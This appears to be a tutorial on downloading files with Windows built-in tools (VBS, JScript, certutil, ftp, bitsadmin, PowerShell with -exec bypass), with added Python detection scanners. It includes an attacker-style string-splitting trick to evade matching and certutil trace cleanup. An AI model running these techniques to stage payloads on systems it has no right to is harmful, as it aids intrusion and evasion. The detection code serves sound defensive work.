1. Downloading a file with VBS
1. Run the following command to echo a VBS file to disk
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>downfile.vbs
2. Download using the VBS script
cscript downfile.vbs http://www.baidu.com/robots.txt C:\Users\John\Desktop\test.txt
3. A non-interactive version of the VBS script (the original had the lines run together and a typo in the variable name; path backslashes are not escape characters in VBScript, so single backslashes are used):
strFileURL = "http://www.baidu.com/robots.txt"
strHDLocation = "c:\test\logo.txt"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
2. Downloading a file with certutil
1. Download the file
certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt
2. Clean up traces (remove the cached copy)
certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt delete
3. Downloading a file with ftp
The redirection is written before each echo on purpose: cmd.exe treats a single digit directly in front of > or >> as a file-handle number, so "echo open 192.168.1.115 21> ftp.txt" would write only "open 192.168.1.115 2" to the file and "echo 123>> ftp.txt" would redirect handle 3 and write "12"; inserting a space before the operator instead would put a trailing space into the user name and password lines.
>ftp.txt echo open 192.168.1.115 21
>>ftp.txt echo 123            // user
>>ftp.txt echo 123            // password
>>ftp.txt echo binary         // binary mode
>>ftp.txt echo get robots.txt
>>ftp.txt echo bye
ftp -s:ftp.txt                // download
4. Downloading a file with JS
1. The downfile.js file is as follows
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;  // binary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("保存的文件.exe");  // output file name (literally "saved file.exe" in the original)
2. Command
cscript /nologo downfile.js http://www.baidu.com/robots.txt
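Both script-host downloaders above (the VBS one-liner and downfile.js) rely on the same two building blocks: an HTTP COM object (XMLHTTP or WinHttpRequest) and ADODB.Stream's SaveToFile. The echo one-liner also splits those ProgIDs across two string literals ("adod"+"b.stream"), which defeats a plain substring match. The Python below is an added example for this page, not part of the original, of a static scanner that folds concatenated literals back together before matching; the sample scripts and the ProgID list are constructed for the example.

```python
import re

# Constructed samples, modelled on the VBS and JS downloaders on this page.
# SAMPLE_VBS_SPLIT uses the "adod"+"b.stream" trick from the echo one-liner.
SAMPLE_VBS_SPLIT = (
    'set a=createobject("adod"+"b.stream"):'
    'set w=createobject("micro"+"soft.xmlhttp"):'
    'w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:'
    'a.write w.responsebody:a.savetofile wsh.arguments(1),2'
)
SAMPLE_JS = (
    'var r = new ActiveXObject("WinHttp.WinHttpRequest.5.1");\n'
    'r.Open("GET", WScript.Arguments(0), false);\n'
    'r.Send();\n'
    'var s = new ActiveXObject("ADODB.Stream");\n'
    's.Type = 1; s.Open(); s.Write(r.ResponseBody);\n'
    's.SaveToFile("out.exe");\n'
)
SAMPLE_BENIGN = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'WScript.Echo fso.GetTempName()\n'
)

# Two adjacent string literals joined by + (JScript/VBScript) or & (VBScript).
_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')

# ProgIDs that fetch over HTTP, and the call that writes the body to disk.
HTTP_PROGIDS = ("msxml2.xmlhttp", "msxml2.serverxmlhttp", "microsoft.xmlhttp",
                "winhttp.winhttprequest")
SAVE_CALL = "savetofile"


def normalize(script: str) -> str:
    """Lower-case the script and fold concatenated string literals back together,
    repeating until nothing changes so "a"+"b"+"c" collapses fully."""
    text = script.lower()
    while True:
        folded = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded


def scan(script: str) -> dict:
    """Classify a script body: 'download-to-disk' when an HTTP ProgID and
    SaveToFile both appear, 'http-client' for the ProgID alone, else 'clean'."""
    text = normalize(script)
    http = [p for p in HTTP_PROGIDS if p in text]
    saves = SAVE_CALL in text
    if http and saves:
        verdict = "download-to-disk"
    elif http:
        verdict = "http-client"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "http_progids": http,
        "writes_file": saves,
        # True when folding changed the text, i.e. a literal had been split up
        "split_strings": text != script.lower(),
    }


if __name__ == "__main__":
    for name, body in (("vbs-split", SAMPLE_VBS_SPLIT), ("js", SAMPLE_JS),
                       ("benign", SAMPLE_BENIGN)):
        print(name, scan(body))
```

The folding step is what matters: without it the split VBS sample contains neither "adodb.stream" nor "microsoft.xmlhttp" as a substring. The "split_strings" flag is worth surfacing on its own, since legitimate scripts rarely need to split a ProgID across literals.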
5. Downloading a payload with bitsadmin
1. bitsadmin is built into Windows 7 and later; usage:
bitsadmin /rawreturn /transfer down "https://www.baidu.com/robots.txt" C:\Users\John\Desktop\test666.exe
2. If the download is large, use the following command alongside it to raise the job's priority
bitsadmin /setpriority down foreground
6. PowerShell file download
6.1 Download with a PowerShell script file
6.1.1 PowerShell 2
1. test.ps1 is as follows:
$Urls = @()
$Urls += "http://www.baidu.com/robots.txt"
$OutPath = "C:\Users\John\Desktop\"
ForEach ($item in $Urls) {
    # output file name is the last path segment of the URL
    $file = $OutPath + ($item).split('/')[-1]
    (New-Object System.Net.WebClient).DownloadFile($item, $file)
}
2. Command
powershell -File test.ps1
6.1.2 PowerShell 3
1. down.ps1
File contents are as follows
$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
2. Command:
powershell down.ps1
6.2 One-liner download
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://www.baidu.com/robots.txt','E:\robots.txt')
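Every technique on this page (cscript/wscript with a URL argument, certutil -urlcache including the delete cleanup, the ftp -s: script, bitsadmin /transfer and /setpriority, and the PowerShell WebClient/Invoke-WebRequest forms) runs as a process whose full command line is recorded in Sysmon Event ID 1 or Windows security event 4688 when command-line auditing is enabled. The Python below is an added example for this page, not part of the original, of one detection rule per technique run over such events; the events, hosts (203.0.113.x documentation addresses) and paths are constructed for the example.

```python
import re

# Constructed process-creation events in the shape of Sysmon EventID 1 /
# Windows 4688 command lines; hosts and paths are made up for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/robots.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/robots.txt delete"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r'bitsadmin /rawreturn /transfer down "http://203.0.113.5/robots.txt" C:\Users\John\Desktop\test.exe'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /setpriority down foreground"},
    {"Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": "ftp -s:ftp.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://203.0.113.5/robots.txt','E:\\robots.txt')"},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript downfile.vbs http://203.0.113.5/robots.txt C:\Users\John\Desktop\test.txt"},
    # two benign uses of the same binaries, which must not fire
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify C:\\certs\\server.cer"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

# One regex per technique on the page, matched case-insensitively against the
# whole command line. The binary name is required so a rule keys on the tool
# plus the argument shape that makes it a download, not on the tool alone.
RULES = {
    "certutil_urlcache":        r"\bcertutil(\.exe)?\b.*\s-urlcache\b",
    "certutil_urlcache_delete": r"\bcertutil(\.exe)?\b.*\s-urlcache\b.*\bdelete\s*$",
    "bitsadmin_transfer":       r"\bbitsadmin(\.exe)?\b.*\s/transfer\b",
    "bitsadmin_priority":       r"\bbitsadmin(\.exe)?\b.*\s/setpriority\b",
    "ftp_scripted":             r"\bftp(\.exe)?\b.*\s-s:",
    "powershell_download":      r"\bpowershell(\.exe)?\b.*(downloadfile|downloadstring|invoke-webrequest|net\.webclient)",
    "script_host_with_url":     r"\b[cw]script(\.exe)?\b.*https?://",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}


def classify(command_line: str) -> list:
    """Return the names of every rule that matches this command line, sorted."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(command_line))


def scan_events(events) -> list:
    """Run every rule over every event; return only the events that fired."""
    findings = []
    for idx, ev in enumerate(events):
        hits = classify(ev["CommandLine"])
        if hits:
            findings.append({"index": idx, "image": ev["Image"], "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f['index']}: {', '.join(f['rules'])}  <- {f['image']}")
```

The delete form of certutil fires two rules, which is useful in triage: a cache download followed by a cache delete from the same session is a stronger signal than either alone. Correlating a bitsadmin_priority hit with the bitsadmin_transfer hit that precedes it works the same way.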